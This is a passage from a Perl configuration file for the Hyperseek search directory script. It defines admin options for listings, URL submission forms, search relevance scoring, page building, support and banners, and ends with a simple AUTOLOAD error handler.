$vars{'HYPERSEEK_Listings'}{'13:listing_columns'} = ["How many columns do you want the listings divided into","SELECT","1|2|3|4|5"];
$vars{'HYPERSEEK_Listings'}{'14:listing_column_table_width'} = ["If more than one column, how wide should the table be (pixels or %)","TEXT",""];
$vars{'HYPERSEEK_Listings'}{'15:listing_column_width'} = ["If more than one column, how wide should each column be (pixels or %)","TEXT",""];
$vars{'HYPERSEEK_Listings'}{'16:column_format'} = ["If using multi column listings, how should they be sorted","SELECT","Top to Bottom|Left to Right"];
$vars{'HYPERSEEK_Listings'}{'17:yh_show_hits'} = ["Track hits for each site","SELECT","YES|NO"];
$vars{'HYPERSEEK_Listings'}{'18:yh_expired'} = ["Will you be using expiring links","SELECT","YES|NO"];
$vars{'HYPERSEEK_Listings'}{'19:yh_extra_links'} = ["How would you like extra result pages accessed","SELECT","SELECT|LINKS|NONE"];
$vars{'HYPERSEEK_Listings'}{'20:yh_morelinks_in_body'} = ["Hide links to additional search results as part of PLUGIN:BODY ?","SELECT","YES|NO"];
$vars{'HYPERSEEK_Listings'}{'21:Use_Ratings'} = ["Will you be using the RATE-IT system","SELECT","YES|NO"];
$vars{'HYPERSEEK_Listings'}{'22:yh_build_ratings'} = ["Would you like site ratings to show on built pages","SELECT","YES|NO"];
$vars{'HYPERSEEK_Listings'}{'23:rate_min_votes'} = ["Minimum number of votes before ratings are reported","TEXT","3"];
$vars{'HYPERSEEK_Listings'}{'24:yh_top'} = ["For the TOP 10 Plugin, how many listings to report","TEXT","10"];
$vars{'HYPERSEEK_Listings'}{'25:top_cookie_days'} = ["For Top10 and Ratings, how many days to allow between votes","TEXT","7"];
$vars{'HYPERSEEK_Listings'}{'26:yh_comments'} = ["Will you be using the Visitor Comments System","SELECT","YES|NO"];
$vars{'HYPERSEEK_Listings'}{'27:yh_javascript'} = ["Use JavaScript windows for Comments/Rate-It","SELECT","YES|NO"];
$vars{'HYPERSEEK_Listings'}{'28:yh_show_li'} = ["Would you like the listings drawn as <B>dotted,numbered,or plain</B>","SELECT","LI|OL|Normal"];
$vars{'HYPERSEEK_Listings'}{'29:yh_show_header'} = ["Would you like to show the header (Displyaing results x to x) on result pages?","SELECT","YES|NO"];

$vars{'HYPERSEEK_Add'}{'01:add_url_spam_time'} = ["How long should the spam timer give visitors to complete the add url process(in minutes)","TEXT","20"];
$vars{'HYPERSEEK_Add'}{'02:yh_accounts'} = ["Require users to have accounts before adding/modifying links","SELECT","YES|NO"];
$vars{'HYPERSEEK_Add'}{'03:jackhammer_accounts_url'} = ["Full URL (including http://... to your seaccount.cgi program","TEXT",""];
$vars{'HYPERSEEK_Add'}{'03:account_startup_screen'} = ["When logging into their account, which screen do you want to show your users initially?<BR><I>Note: The <B>Report</B> and <B>Financial</B> options are only valid if you have Jackhammer installed</I>","SELECT","Manage URLs|Hit Statistics|Financial Status|Report Generator"];
$vars{'HYPERSEEK_Add'}{'03:accounts_list_or_select'} = ["On bidding screen, show websites in drop down or a list","SELECT","LIST|DROPDOWN"];
$vars{'HYPERSEEK_Add'}{'04:account_frames'} = ["For the user side, select the framing option","SELECT","Choice|Frames Only|No Frames Only"];
$vars{'HYPERSEEK_Add'}{'05:yh_add_direct'} = ["Allow users with accounts to directly add links","SELECT","YES|NO"];
$vars{'HYPERSEEK_Add'}{'06:yh_change_direct'} = ["Allow users with accounts to directly change links","SELECT","YES|NO"];
$vars{'HYPERSEEK_Add'}{'07:yh_add_url_spider'} = ["Force the use of the spider to add links","SELECT","YES|NO"];
$vars{'HYPERSEEK_Add'}{'08:yh_suggest'} = ["Allow visitors to suggest new categories","SELECT","YES|NO"];
$vars{'HYPERSEEK_Add'}{'09:Default_Rank'} = ["Default ranking for new listings","TEXT","3"];
$vars{'HYPERSEEK_Add'}{'10:yh_max_keywords'} = ["Maximum number of keywords allowed","TEXT","100"];
$vars{'HYPERSEEK_Add'}{'11:yh_max_desc'} = ["Maximum number of characters allowed in the description","TEXT","500"];
$vars{'HYPERSEEK_Add'}{'12:yh_add_include'} = ["Which fields do you want shown on the submit form?","HEADER",""];
$vars{'HYPERSEEK_Add'}{'13:url_include'} = ["URL","CHECKBOX","checked"];
$vars{'HYPERSEEK_Add'}{'14:title_include'} = ["Title","CHECKBOX","checked"];
$vars{'HYPERSEEK_Add'}{'15:email_include'} = ["e-Mail Address","CHECKBOX","checked"];
$vars{'HYPERSEEK_Add'}{'16:desc_include'} = ["Description","CHECKBOX","checked"];
$vars{'HYPERSEEK_Add'}{'17:keys_include'} = ["Keywords","CHECKBOX","checked"];
$vars{'HYPERSEEK_Add'}{'18:name_include'} = ["Contact Name","CHECKBOX","checked"];
$vars{'HYPERSEEK_Add'}{'19:address_include'} = ["Address","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'20:city_include'} = ["City","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'21:state_include'} = ["State","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'22:zip_include'} = ["Zip/Postal Code","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'23:country_include'} = ["Country","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'24:phone_include'} = ["Phone Number","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'25:fax_include'} = ["Fax Number","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'26:site_icon_include'} = ["Site Icon","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'27:desc_icon_include'} = ["Description Icon","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'27:price_include'} = ["Price","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'28:field1_include'} = ["Extra Field 1","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'29:field2_include'} = ["Extra Field 2","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'30:field3_include'} = ["Extra Field 3","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'31:field4_include'} = ["Extra Field 4","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'32:field5_include'} = ["Extra Field 5","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'33:field6_include'} = ["Extra Field 6","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'34:field7_include'} = ["Extra Field 7","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'35:field8_include'} = ["Extra Field 8","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'36:field9_include'} = ["Extra Field 9","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'37:field10_include'} = ["Extra Field 10","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'38:yh_add_required'} = ["Which fields are required for a users to submit a listing?","HEADER",""];
$vars{'HYPERSEEK_Add'}{'39:url_required'} = ["URL","CHECKBOX","checked"];
$vars{'HYPERSEEK_Add'}{'40:title_required'} = ["Title","CHECKBOX","checked"];
$vars{'HYPERSEEK_Add'}{'41:email_required'} = ["e-Mail Address","CHECKBOX","checked"];
$vars{'HYPERSEEK_Add'}{'42:desc_required'} = ["Description","CHECKBOX","checked"];
$vars{'HYPERSEEK_Add'}{'43:keys_required'} = ["Keywords","CHECKBOX","checked"];
$vars{'HYPERSEEK_Add'}{'44:name_required'} = ["Contact Name","CHECKBOX","checked"];
$vars{'HYPERSEEK_Add'}{'45:address_required'} = ["Address","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'46:city_required'} = ["City","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'47:state_required'} = ["State","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'48:zip_required'} = ["Zip/Postal Code","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'49:country_required'} = ["Country","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'50:phone_required'} = ["Phone Number","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'51:fax_required'} = ["Fax Number","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'52:site_icon_required'} = ["Site Icon","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'53:desc_icon_required'} = ["Description Icon","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'53:price_required'} = ["Price","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'54:field1_required'} = ["Extra Field 1","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'55:field2_required'} = ["Extra Field 2","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'56:field3_required'} = ["Extra Field 3","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'57:field4_required'} = ["Extra Field 4","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'58:field5_required'} = ["Extra Field 5","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'59:field6_required'} = ["Extra Field 6","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'60:field7_required'} = ["Extra Field 7","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'61:field8_required'} = ["Extra Field 8","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'62:field9_required'} = ["Extra Field 9","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'63:field10_required'} = ["Extra Field 10","CHECKBOX",""];
$vars{'HYPERSEEK_Add'}{'64:yh_spellcheck'} = ["Do you want all new submissions to have a spellcheck option","SELECT","YES|NO"];
$vars{'HYPERSEEK_Add'}{'65:yh_verify_links'} = ["Do you want all new submissions verified","SELECT","YES|NO"];
$vars{'HYPERSEEK_Add'}{'66:yh_parse_remote'} = ["Do you want to verify that all submitted links contain certain text","SELECT","YES|NO"];
$vars{'HYPERSEEK_Add'}{'67:yh_verify_text'} = ["If so, the text to search for","TEXT",""];
$vars{'HYPERSEEK_Add'}{'68:yh_domains'} = ["Adding a listing can only be done from the following domains","TEXT",""];
$vars{'HYPERSEEK_Add'}{'69:yh_forbidden_domains'} = ["Banned Domains Error URL","TEXT",""];
$vars{'HYPERSEEK_Add'}{'70:yh_noip'} = ["Bad IP Error URL","TEXT",""];
$vars{'HYPERSEEK_Add'}{'71:yh_bad_words'} = ["Bad Words Error URL","TEXT",""];
$vars{'HYPERSEEK_Add'}{'72:yh_no_cat'} = ["No Category Error URL","TEXT",""];
$vars{'HYPERSEEK_Add'}{'73:yh_thanks'} = ["Thank you URL","TEXT","/search/thanks.html"];
$vars{'HYPERSEEK_Add'}{'74:yh_add_html'} = ["How should we handle HTML CODE in new submissions","SELECT","ALLOW|DISALLOW|IGNORE|SHOWCODE"];
$vars{'HYPERSEEK_Add'}{'75:yh_max_new'} = ["Number of submissions to show per page in the admin","TEXT","10"];
$vars{'HYPERSEEK_Add'}{'76:yh_add_dups'} = ["Check for duplicates when reviewing new submissions","SELECT","STRICT|DOMAIN|NO"];
$vars{'HYPERSEEK_Add'}{'77:yh_submit_format'} = ["Submission review format","SELECT","Minimal|Edit"];
$vars{'HYPERSEEK_Add'}{'78:yh_moderator_email'} = ["Force Moderators to send an approval letter","SELECT","YES|NO"];
$vars{'HYPERSEEK_Add'}{'79:add_url_email'} = ["Enable Email Approvals?","SELECT","YES|NO"];

$vars{'HYPERSEEK_Search'}{'01:show_elapsed'} = ["Show Elapsed time on searches","SELECT","YES|NO"];
$vars{'HYPERSEEK_Search'}{'02:keyhole'} = ["Keyhole Post URL","TEXT","http://www.keyholesearch.com/keyhole_post.cgi"];
$vars{'HYPERSEEK_Search'}{'04:yh_search_sort'} = ["How would you like the SEARCH RESULTS sorted","SELECT","SCORE|TITLE|RANK|ALPHA-RANK|RANK then SCORE|CATEGORY"];
$vars{'HYPERSEEK_Search'}{'05:yh_how_to'} = ["Which fields should the search engine index for searching (note that if you select <B>PHRASES ONLY</B>, the system will ignore all other selections)","MULTIPLE","TITLE|CAT|DESC|KEYS|KEYWORD PHRASES ONLY|INDEX NOTHING"];

$vars{'HYPERSEEK_Search'}{'06:yh_bold'} = ["How do we identify matched terms in results","SELECT","Do Nothing|BOLD|RED|BLUE|YELLOW HIGHLIGHT"];
$vars{'HYPERSEEK_Search'}{'07:yh_ignore'} = ["Ignore the following words in searches and indexing","TEXT","of in on for to at by and the why"];
$vars{'HYPERSEEK_Search'}{'08:yh_max_results'} = ["Max results returned before search warning","TEXT","1000"];
$vars{'HYPERSEEK_Search'}{'10:yh_search_cat'} = ["In search results, do you want to show category matches as well","SELECT","YES|NO"];
$vars{'HYPERSEEK_Search'}{'11:yh_show_summary'} = ["Show the search criteria ahead of results","SELECT","YES|NO"];
$vars{'HYPERSEEK_Search'}{'12:yh_qualify'} = ["Would you like to offer a qualifying (Refined) search option","SELECT","Yes|No"];

$vars{'HYPERSEEK_Search'}{'13'} = ["Options for SQL Users Only....","HEADER",""];
$vars{'HYPERSEEK_Search'}{'14:yh_search_speed'} = ["How should the search engine handle search result sets","SELECT","Act Normally|Limit Results to $global{yh_max_results}|Enable Fast Searching"];
$vars{'HYPERSEEK_Search'}{'15:yh_force_and'} = ["Force \"AND\" on all searches?","SELECT","YES|NO"];
$vars{'HYPERSEEK_Search'}{'16:keyword_thickness'} = ["<B>*</B> Should the search engine increase the 'thickness' of indexed words and phrases","SELECT","YES|NO"];
$vars{'HYPERSEEK_Search'}{'17:yh_score_title'} = ["<B>*</B> For result relevance, assign how many points for TITLE matches (A number between 1 and 25)","TEXT","7"];
$vars{'HYPERSEEK_Search'}{'18:yh_score_desc'} = ["<B>*</B> For result relevance, assign how many points for DESCRIPTION matches (A number between 1 and 25)","TEXT","3"];
$vars{'HYPERSEEK_Search'}{'19:yh_score_keys'} = ["<B>*</B> For result relevance, assign how many points for KEYWORDS matches (A number between 1 and 25)","TEXT","3"];
$vars{'HYPERSEEK_Search'}{'20:yh_factor_hits'} = ["<B>*</B> Relevance Scoring 'Factor' for Link Popularity (Enter a decimal number between 0 and 1.25)","TEXT",".01"];
$vars{'HYPERSEEK_Search'}{'21:yh_factor_votes'} = ["<B>*</B> Relevance Scoring 'Factor' for Link Votes (Between 0 and 1.25)","TEXT",".01"];
$vars{'HYPERSEEK_Search'}{'22:yh_factor_links'} = ["<B>*</B> Relevance Scoring 'Factor' for Altavista 'Link To' numbers (Between 0 and 1.25)","TEXT",".01"];
$vars{'HYPERSEEK_Search'}{'23:yh_factor_ranking'} = ["<B>*</B> Relevance Scoring 'Factor' for Visitor Rating (Between 0 and 1.25)","TEXT",".01"];

$vars{'HYPERSEEK_Build'}{'01:yh_build'} = ["Will you be using BUILT HTML Pages for the categories","SELECT","YES|NO"];
$vars{'HYPERSEEK_Build'}{'02:EXT'} = ["What extension should be used for built pages","SELECT","htm|html|shtml|jhtml|phtml|cfm"];
$vars{'HYPERSEEK_Build'}{'03:BANNER_CALL'} = ["How should we show the Banners","SELECT","SSI Include|SSI Exec|Normal HTML"];
$vars{'HYPERSEEK_Build'}{'04:DIR'} = ["Into which directory on your server should we build the static pages","TEXT",""];
$vars{'HYPERSEEK_Build'}{'05:VIRTUAL'} = ["What is the virtual(browser) path to the build directory","TEXT",""];
$vars{'HYPERSEEK_Build'}{'06:yh_build_lower'} = ["Force Lowercase for Build Directories and files","SELECT","YES|NO"];
$vars{'HYPERSEEK_Build'}{'07:yh_build_directory'} = ["Build Pages into a single directory or expanded tree","SELECT","SINGLE DIRECTORY|TREE"];

$vars{'SUPPORT'}{'01:support_email'} = ["Email Address where all support mails go","TEXT","support\@yoursite.com"];
$vars{'SUPPORT'}{'02:id_location'} = ["Location of the Case ID Number","SELECT","Address|Subject Line"];
$vars{'SUPPORT'}{'03:addr_delimiter'} = ["If storing the id in the Address, what delimiter should we use","TEXT","-"];
$vars{'SUPPORT'}{'04:subj_delimiter'} = ["If storing the id in the Subject, what delimiter should we use","TEXT",";"];
$vars{'SUPPORT'}{'05:log_errors'} = ["Where should we log errors","MULTIPLE","Text-File|Database|Email"];
$vars{'SUPPORT'}{'06:default_supp'} = ["In the event that there are no reps to send a support request to, who should be the fallback?","TEXT","steven"];
$vars{'SUPPORT'}{'07:close_on_reply'} = ["Automatically close a issue when the issue is replied by a support person.","SELECT","YES|NO"];

$vars{'BANNERS'}{'01:PANIC_IMAGE'} = ["The url to your panic image, to be shown when there's nothing else to show","TEXT","/search/banners/panic.gif"];
$vars{'BANNERS'}{'02:PANIC_URL'} = ["The url to link to from this panic image.","TEXT","/search/advertisehere.html"];
$vars{'BANNERS'}{'02:bm_recursive'} = ["If using Bannermaster with Hyperseek, do you want to do recursive group targeting?","SELECT","NO|YES"];

$vars{'WEBRING'}{'01:ring_thanks'} = ["The url to your thank you for signing up page.","TEXT","/search/ring_thanks.html"];

}


sub AUTOLOAD {


   print "Content-Type: text/plain\n\n";
   print "Subroutine not found ($y)";

}
